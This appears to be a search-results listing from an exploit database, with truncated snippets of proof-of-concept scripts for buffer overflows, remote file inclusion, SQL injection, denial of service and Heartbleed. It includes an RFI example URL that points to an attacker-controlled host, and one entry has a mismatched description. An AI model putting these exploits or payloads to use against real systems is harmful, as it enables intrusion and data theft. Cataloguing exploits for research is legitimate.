1326 matches found
Hewlett-Packard FTP Print Server <= 2.4.5 - Buffer Overflow (PoC)
No description provided by source. !/usr/bin/python import sys from ftplib import FTP print Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow POC print Copyright c Joxean Koret print if lensys.argv == 1: print Usage: %s target % sys.argv0 sys.exit0 target = sys.argv1 print + Running...
McNews 1.x Install.PHP Arbitrary File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class McNewsRemoteFileIncludePOCBase: vulID = '78899' version = '1' vulDate = '2005-03-17' author = ' '...
RedBlog 0.5 Index.PHP Remote File Include Vulnerability
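RedBlog 0.5 Index.PHP remote file include vulnerability. Vulnerability type: input validation error. Impact: an attacker can exploit this vulnerability to execute a remote PHP file, and thereby attack RedBlog or even take control of the server. exp: http://www.example.com/Path/index.php?rootpath==http://evilscripts? Solution: the vendor has not provided a patch; using Jiasule (加速乐) is recommended: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from...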
Quick Player 1.3 Unicode SEH Exploit
No description provided by source. Quick Player 1.3 Unicode SEH Exploit Author Abhishek Lyall and Puneet Jain [email protected] , abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Download Vulnerable...
Microsoft Internet Explorer 7.0 HTML Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/23178/info Microsoft Internet Explorer is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions. This issue is triggered when an attacker entices a victim user to visit ...
Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)
No description provided by source. !/usr/bin/python Exploit Title: Honestech VHS to DVD = 3.0.30 Deluxe Local Buffer Overflow SEH Date: September 16, 2010 Author: Brennon Thomas [email protected] Software Link: n/a Version: = 3.0.30.0 Deluxe Tested on: Windows XP SP2/SP3 using Honestech VHS to...
Microsoft Active Directory LDAP Server Username Enumeration Weakness
No description provided by source. source: http://www.securityfocus.com/bid/32305/info Microsoft Active Directory is prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input. Attackers may exploit this weakness to discern valid...
NIBE heat pump LFI exploit
No description provided by source. !/usr/bin/python import socket,sys,os,base64 NIBE heat pump LFI exploit Written by Jelmer de Hen Published at http://h.ackack.net/?p=302 Special thanks to Fredrik Nordberg Almroth and Mathias Karlsson for obtaining this information http://h.ackack.net/?p=274 whi...
Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe
No description provided by source. !/usr/bin/env python Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow Discovered by babi Reference: http://www.exploit-db.com/exploits/11288 Exploit Dev by Nullthreat & Pure|Hate import socket, sys try: host = sys.argv1 except: print usage: +...
Insky CMS 006-0111 - Multiple Remote File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class InskyCMSRemoteFileIncludePOCBase: vulID = '68005' version = '1' vulDate = '2006-06-25' author = ' '...
SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit
No description provided by source. !/usr/bin/env python SPIP - Content Management System 2.0.9 exploit http://www.securityfocus.com/bid/36008 Author : KernelPanik import urllib, urllib2 import cookielib import sys def sendrequesturlOpener, url, postdata=None: request = urllib2.Requesturl url =...
JAKCMS <= 2.01 RC1 - Blind SQL Injection Exploit
No description provided by source. !/usr/bin/python jakCMS = v2.01 RC1 Blind SQL Injection Exploit Understanding: The parameters 'JAKCOOKIENAME' and 'JAKCOOKIEPASS' are parsed via cookies to the application and are unchecked for malicious characters. The contents of these variables are directly...
Firefly Media Server <= 0.2.4 - Remote Denial of Service Exploit
No description provided by source. !C:\python25\python25.exe Advisory : UPH-07-02 mt-dappd/Firefly media server remote DoS Discovered by nnp http://www.unprotectedhex.com import sys import socket import time if lensys.argv != 3: sys.exit-1 killmsg = GET /xml-rpc?method=stats HTTP/1.1\r\n...
Core FTP Server Version 1.2, build 535, 32-bit - Crash Poc
D-Link DIR-652, DIR-835, DIR-855L, DGL-500, and DHP-1565 suffer from clear text storage of passwords, cross site scripting, and sensitive information disclosure vulnerabilities. !/usr/bin/python import socket,sys,time def Usage: print "Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C....
enip-info NSE Script
This NSE script sends an EtherNet/IP packet to a remote device that has TCP 44818 open. The script sends a Request Identity packet and, once a response is received, validates that it is a proper response to the command that was sent and then parses out the data. Information...
More terrifying than imagined! In-depth analysis of the OpenSSL “Heartbleed” vulnerability - vulnerability warning - the black bar safety net
Author: yaoxi. Original source: http://blog.wangzhan.360.cn/ Recently, OpenSSL disclosed this year's most serious security vulnerability, which the hacker community has named the “Heartbleed” vulnerability. According to the 360 Site Guard security team's analysis of the vulnerability, it is not only related to htt...
Exploit for Out-of-bounds Read in Openssl
HeartBleed Tester & Exploit --------------------------- NB Ne...
TLS Heartbeat Proof Of Concept
!/usr/bin/env python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. Modified by Csaba Fitzl for multiple SSL / TLS version support import sys import struct import socket import time import select import ...
Heartbleed Proof Of Concept
!/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options =...
OpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure
!/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options =...